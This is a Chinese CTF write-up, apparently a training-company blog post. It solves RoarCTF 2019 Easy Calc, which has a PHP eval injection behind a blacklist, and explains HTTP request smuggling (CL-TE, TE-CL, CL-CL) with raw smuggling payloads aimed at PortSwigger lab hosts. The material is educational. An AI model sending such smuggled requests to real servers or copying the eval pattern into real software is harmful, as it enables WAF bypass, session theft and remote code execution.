\u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E用解析特性来做的话,大概思路是这样的:变量前加空格绕WAF,用scandir()和chr()看目录下有啥文件,file_get_contents读取flag文件。用解法二做的话,不需要考虑空格绕waf的问题,后面做法一致:\u003C\u002Fp\u003E\u003Cp\u003E\u003Cimg referrerpolicy=\"no-referrer\" alt=\"图1.png\" src=\"\u002Fcloud-image\u002Fnews\u002F79f1ea9e-7bee-4f35-8337-5a66adc697a5.png\" width=\"872\" height=\"328.13305613305613\"\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E到这里估计很多人跟我当时一样懵圈了,又返回400又拿到了flag。这里先留个悬念\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E什么是HTTP请求走私\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003EHTTP请求走私这一攻击方式很特殊,它不像其他的Web攻击方式那样比较直观,它更多的是在复杂网络环境下,不同的服务器对RFC标准实现的方式不同,程度不同。在现阶段广泛使用的HTTP1.1协议,提供了两种不同方式来指定请求的结束位置,它们是Content-Length标头和Transfer-Encoding标头,Content-Length标头简单明了,它以字节为单位指定消息内容体的长度。\u003C\u002Fp\u003E\u003Cp\u003ETransfer-Encoding标头用于指定消息体使用分块编码(ChunkedEncode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为0的块结束,也就是说解析遇到0数据块就结束。\u003C\u002Fp\u003E\u003Cp\u003E这就导致如果我们使用如反向代理一类的服务器(后面简称为前端服务器)时,前端和后端系统就请求之间的边界没有达成一致的话,就会产生HTTP走私攻击,很容易使得攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E如何实现HTTP请求走私攻击\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E当我们向代理服务器发送一个比较模糊的HTTP请求时,由于两者服务器的实现方式不同,可能代理服务器认为这是一个HTTP请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分,就算是走私的请求,当该部分对正常用户的请求造成了影响之后,就实现了HTTP走私攻击。\u003C\u002Fp\u003E\u003Ch3\u003E\u003Cb\u003ECL不为0时\u003C\u002Fb\u003E\u003C\u002Fh3\u003E\u003Cp\u003E该情况主要针对不含请求体的HTTP请求,主要以GET请求为主。假如我们的前端服务器允许GET请求携带请求体,但后端服务器不允许GET请求携带请求体时,会直接忽略掉Content-Length头,进而造成请求走私。\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EGET \u002F HTTP\u002F1.1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: example.com\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Length : 51\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EGET \u002F HTTP\u002F1.1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: example.com\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Eattack: 1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Ehhh: \u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E这个请求对于前端服务器来说,是一个正常的请求,但转发到后端时,因为后端不认Content-Length头,所以这个请求就变成了两个请求,当下一个请求到达时,就会拼接到上一个请求中\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EGET \u002F HTTP\u002F1.1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: example.com\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Length : 51\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EGET \u002F HTTP\u002F1.1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: example.com\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Eattack: 1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Ehhh: GET \u002F HTTP\u002F1.1\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: example.com\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Length : 51\\r\\n\u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E这会存在什么危害呢?因为HTTP为无状态协议,并且很多网站使用Cookie来对用户状态进行标识,当我们在第二个数据包构造如删除用户、转账、修改密码等敏感操作的时候,起到盗取其他用户cookie的作用。\u003C\u002Fp\u003E\u003Ch3\u003E\u003Cb\u003ECL-TE \u003C\u002Fb\u003E\u003C\u002Fh3\u003E\u003Cp\u003ECL-TE,即当我们发送内含两个请求头的请求包时,前端服务器只处理Content-Length,而后端服务器忽略Content-Length头,只处理Transfer-Encoding请求头。这里用Burpsuite的官方靶场进行演示:\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EPOST \u002F HTTP\u002F1.1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: ac911f721f9ee241c01763ef008600f8.web-security-academy.net\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EConnection: close\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ECache-Control: max-age=0\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Esec-ch-ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Esec-ch-ua-mobile: ?0\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Esec-ch-ua-platform: \"Windows\"\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EUpgrade-Insecure-Requests: 1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F94.0.4606.81 Safari\u002F537.36\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.9\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ESec-Fetch-Site: none\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ESec-Fetch-Mode: navigate\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ESec-Fetch-User: ?1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ESec-Fetch-Dest: document\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EAccept-Language: zh-CN,zh;q=0.9\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ECookie: session=kSvNgyDye0o1097OwEFsKJD9eu6tpo4k\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Length: 6\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ETransfer-Encoding: chunked\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E0\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EA\u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E当我们用Burp两次重放该数据包,会得到返回结果:\u003C\u002Fp\u003E\u003Cp\u003E\u003Cimg referrerpolicy=\"no-referrer\" alt=\"图2.png\" src=\"\u002Fcloud-image\u002Fnews\u002F079b4611-d12c-4c0a-bc7c-533ab10f1b42.png\" width=\"872\" height=\"366.55874673629245\"\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E解释一下为什么Content-Length的长度是6,因为Burp把\\r\\n给直接解释成换行了,实际请求体应该是这样:\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E0\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\\r\\n\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EA\u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E后端服务器读到0\\r\\n\\r\\n就会以为这个数据包已经读完了,最后的字符A会放到下一个请求解析。\u003C\u002Fp\u003E\u003Ch3\u003E\u003Cb\u003ETE-CL \u003C\u002Fb\u003E\u003C\u002Fh3\u003E\u003Cp\u003ETE-CL,即当我们发送内含两个请求头的请求包时,前端服务器只处理Transfer-Encoding,而后端服务器忽略Transfer-Encoding头,只处理Content-Length请求头:\u003C\u002Fp\u003E\u003Cpre\u003E\u003Ccode\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EPOST \u002F HTTP\u002F1.1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EHost: acae1fe41e622a9bc0c7189700950000.web-security-academy.net\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F94.0.4606.81 Safari\u002F537.36\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.9\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ECookie: session=VfTG4xpWeu1NboBIfCyqsHiWb8UjNDGZ\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-length: 4\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003ETransfer-Encoding: chunked\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E5c\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EGPOST \u002F HTTP\u002F1.1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Type: application\u002Fx-www-form-urlencoded\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003EContent-Length: 15\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003Ex=1\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E0\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003Cbr\u003E\u003Cspan role=\"presentation\" style=\"box-sizing: border-box; padding-right: 0.1px;\"\u003E\u003Cspan cm-text=\"\" cm-zwsp=\"\" style=\"box-sizing: border-box;\"\u003E​\u003C\u002Fspan\u003E\u003C\u002Fspan\u003E\u003C\u002Fcode\u003E\u003C\u002Fpre\u003E\u003Cp\u003E前端服务器对于这个请求来说,会处理Transfer-Encoding,读到0\\r\\n\\r\\n的时候,认为是读取完毕了,就是把他当作一个完整请求,但后端服务器只认Content-length: 4,这就导致GPOST成为了一个新的请求。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cimg referrerpolicy=\"no-referrer\" alt=\"图3.png\" src=\"\u002Fcloud-image\u002Fnews\u002Fba93f943-95d2-494d-9161-321ac825aecb.png\" width=\"872\" height=\"338.8712871287129\"\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Ch3\u003E\u003Cb\u003ECL-CL\u003C\u002Fb\u003E\u003C\u002Fh3\u003E\u003Cp\u003ECL-CL即两个Content-length,当两者的值不同的时候,会返回400错误。但如果服务器不严格按照规范,就会发生前端服务器按照第一个Content-length头的值处理,后端服务器按照第二个Content-length头的值进行处理\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E回到最初\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E因为我们的payload里有两个CL头,对应CL-CL的情形,这时候前后端都会各收到一次我们的请求包,因为服务器的不规范,虽然返回400错误,但是请求依旧发给了后端服务器,造成了WAF的绕过问题。\u003C\u002Fp\u003E",metaDescription:c,metaKeywords:b}},systemName:"蚁景网安 - 网络安全人才培养服务提供商",loginUser:void 0,cacheFlag:"891156e99b77072fe4445cab30e2edc5",isMobileDevice:false}}("从一道CTF题到HTTP走私攻击","HTTP,一道CTF题","最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。想和作者一样做一些CTF相关题目,可以在合天网安实验室CTF实验室进行一些解题操作,实战靶场级的体验!"))
当前位置: 首页 >技术干货>新闻详情

从一道CTF题到HTTP走私攻击

2021-11-03 10:40
1471

前言

最近在复盘之前做过的CTF题时,发现有一道比较有趣。是用的PHP 字符串解析特性Bypass的思路,但这道题远不止于此,还有另一种解法,HTTP请求走私攻击。想和作者一样做一些CTF相关题目,可以在蚁景网安实验室CTF实验室进行一些解题操作,实战靶场级的体验!

RoarCTF 2019 Easy Calc

先看下源码:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\
,'\\','\^'];
       foreach ($blacklist as $blackitem) {
               if (preg_match('/' . $blackitem . '/m', $str)) {
                       die("what are you want to do?");
              }
      }
       eval('echo '.$str.';');
}
?>

用解析特性来做的话,大概思路是这样的:变量前加空格绕WAF,用scandir()和chr()看目录下有啥文件,file_get_contents读取flag文件。用解法二做的话,不需要考虑空格绕waf的问题,后面做法一致:

图1.png

到这里估计很多人跟我当时一样懵圈了,又返回400又拿到了flag。这里先留个悬念

什么是HTTP请求走私

HTTP请求走私这一攻击方式很特殊,它不像其他的Web攻击方式那样比较直观,它更多的是在复杂网络环境下,不同的服务器对RFC标准实现的方式不同,程度不同。在现阶段广泛使用的HTTP1.1协议,提供了两种不同方式来指定请求的结束位置,它们是Content-Length标头和Transfer-Encoding标头,Content-Length标头简单明了,它以字节为单位指定消息内容体的长度。

Transfer-Encoding标头用于指定消息体使用分块编码(ChunkedEncode),也就是说消息报文由一个或多个数据块组成,每个数据块大小以字节为单位(十六进制表示) 衡量,后跟换行符,然后是块内容,最重要的是:整个消息体以大小为0的块结束,也就是说解析遇到0数据块就结束。

这就导致如果我们使用如反向代理一类的服务器(后面简称为前端服务器)时,前端和后端系统就请求之间的边界没有达成一致的话,就会产生HTTP走私攻击,很容易使得攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。

如何实现HTTP请求走私攻击

当我们向代理服务器发送一个比较模糊的HTTP请求时,由于两者服务器的实现方式不同,可能代理服务器认为这是一个HTTP请求,然后将其转发给了后端的源站服务器,但源站服务器经过解析处理后,只认为其中的一部分为正常请求,剩下的那一部分,就算是走私的请求,当该部分对正常用户的请求造成了影响之后,就实现了HTTP走私攻击。

CL不为0时

该情况主要针对不含请求体的HTTP请求,主要以GET请求为主。假如我们的前端服务器允许GET请求携带请求体,但后端服务器不允许GET请求携带请求体时,会直接忽略掉Content-Length头,进而造成请求走私。

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh:

这个请求对于前端服务器来说,是一个正常的请求,但转发到后端时,因为后端不认Content-Length头,所以这个请求就变成了两个请求,当下一个请求到达时,就会拼接到上一个请求中

GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n
\r\n
GET / HTTP/1.1\r\n
Host: example.com\r\n
attack: 1\r\n
hhh: GET / HTTP/1.1\r\n
Host: example.com\r\n
Content-Length : 51\r\n

这会存在什么危害呢?因为HTTP为无状态协议,并且很多网站使用Cookie来对用户状态进行标识,当我们在第二个数据包构造如删除用户、转账、修改密码等敏感操作的时候,起到盗取其他用户cookie的作用。

CL-TE

CL-TE,即当我们发送内含两个请求头的请求包时,前端服务器只处理Content-Length,而后端服务器忽略Content-Length头,只处理Transfer-Encoding请求头。这里用Burpsuite的官方靶场进行演示:

POST / HTTP/1.1
Host: ac911f721f9ee241c01763ef008600f8.web-security-academy.net
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=kSvNgyDye0o1097OwEFsKJD9eu6tpo4k
Content-Length: 6
Transfer-Encoding: chunked

0

A

当我们用Burp两次重放该数据包,会得到返回结果:

图2.png

解释一下为什么Content-Length的长度是6,因为Burp把\r\n给直接解释成换行了,实际请求体应该是这样:

0\r\n
\r\n
A

后端服务器读到0\r\n\r\n就会以为这个数据包已经读完了,最后的字符A会放到下一个请求解析。

TE-CL

TE-CL,即当我们发送内含两个请求头的请求包时,前端服务器只处理Transfer-Encoding,而后端服务器忽略Transfer-Encoding头,只处理Content-Length请求头:

POST / HTTP/1.1
Host: acae1fe41e622a9bc0c7189700950000.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: session=VfTG4xpWeu1NboBIfCyqsHiWb8UjNDGZ
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

前端服务器对于这个请求来说,会处理Transfer-Encoding,读到0\r\n\r\n的时候,认为是读取完毕了,就是把他当作一个完整请求,但后端服务器只认Content-length: 4,这就导致GPOST成为了一个新的请求。

图3.png

CL-CL

CL-CL即两个Content-length,当两者的值不同的时候,会返回400错误。但如果服务器不严格按照规范,就会发生前端服务器按照第一个Content-length头的值处理,后端服务器按照第二个Content-length头的值进行处理

回到最初

因为我们的payload里有两个CL头,对应CL-CL的情形,这时候前后端都会各收到一次我们的请求包,因为服务器的不规范,虽然返回400错误,但是请求依旧发给了后端服务器,造成了WAF的绕过问题。

蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~

扫码咨询客服了解招生最新内容和活动

🎈网安学院推荐课程:Web安全工程师特训班Python全栈安全开发特训班应急响应安全工程师特训班
 CTF-Reverse实战技能特训班CTF-WEB实战技能特训班 CTF-PWN实战技能特训班CTF-MISC实战技能特训班 SRC漏洞挖掘实战班HVV大师课